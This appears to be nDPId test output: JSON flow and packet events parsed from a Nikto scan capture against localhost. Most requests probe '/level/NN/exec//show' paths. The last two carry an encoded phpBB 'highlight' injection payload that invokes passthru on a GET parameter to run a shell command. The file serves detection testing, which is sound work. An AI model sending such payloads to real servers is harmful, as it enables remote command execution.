-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/91\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001338)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1576420277727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277727,"pkt":"AAAAAAAAAAAAAAAACABFAADIYyZAAEAG2Qd\/AAABfwAAAcaaH5DSD1o0DsX43oAYAED+vAAAAQEICp1m\/wadZv8GR0VUIC9sZXZlbC85Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":640,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/92\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001339)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1576420277729,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277729,"pkt":"AAAAAAAAAAAAAAAACABFAADIxzpAAEAGdPN\/AAABfwAAAcacH5ALNv4hgWKnmoAYAED+vAAAAQEICp1m\/widZv8IR0VUIC9sZXZlbC85My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277729,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/93\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001340)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1576420277730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277730,"pkt":"AAAAAAAAAAAAAAAACABFAADIHv9AAEAGHS9\/AAABfwAAAcaeH5AL7Sfmt4JqA4AYAED+vAAAAQEICp1m\/wqdZv8KR0VUIC9sZXZlbC85NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDEpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/94\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001341)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1576420277732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277732,"pkt":"AAAAAAAAAAAAAAAACABFAADIPWZAAEAG\/sd\/AAABfwAAAcagH5BD6AR+QNLU5oAYAED+vAAAAQEICp1m\/wydZv8MR0VUIC9sZXZlbC85NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/95\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001342)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1576420277734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277734,"pkt":"AAAAAAAAAAAAAAAACABFAADISBNAAEAG9Bp\/AAABfwAAAcaiH5A0bnEJpPWxcYAYAED+vAAAAQEICp1m\/w6dZv8OR0VUIC9sZXZlbC85Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/96\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001343)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1576420277736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277736,"pkt":"AAAAAAAAAAAAAAAACABFAADIC2JAAEAGMMx\/AAABfwAAAcakH5C2tzJ7p90VYYAYAED+vAAAAQEICp1m\/xCdZv8PR0VUIC9sZXZlbC85Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/97\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001344)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1576420277737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277737,"pkt":"AAAAAAAAAAAAAAAACABFAADIqydAAEAGkQZ\/AAABfwAAAcamH5BRA5JApfKSEYAYAED+vAAAAQEICp1m\/xGdZv8RR0VUIC9sZXZlbC85OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/98\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001345)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1576420277739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277739,"pkt":"AAAAAAAAAAAAAAAACABFAADI+OxAAEAGQ0F\/AAABfwAAAcaoH5BlRMHxT\/ad\/4AYAED+vAAAAQEICp1m\/xOdZv8SR0VUIC9sZXZlbC85OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/99\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001346)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1576420277741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277741,"pkt":"AAAAAAAAAAAAAAAACABFAAFdQfFAAEAG+ad\/AAABfwAAAcaqH5DRIHj1tdpDy4AYAED\/UQAAAQEICp1m\/xWdZv8VR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM4OCkNCg0K"} -01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001388)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1576420277743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277743,"pkt":"AAAAAAAAAAAAAAAACABFAAFGAG5AAEAGO0J\/AAABfwAAAcasH5AOKDl4jiUqhYAYAED\/OgAAAQEICp1m\/xedZv8XR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzg5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001389)"}} 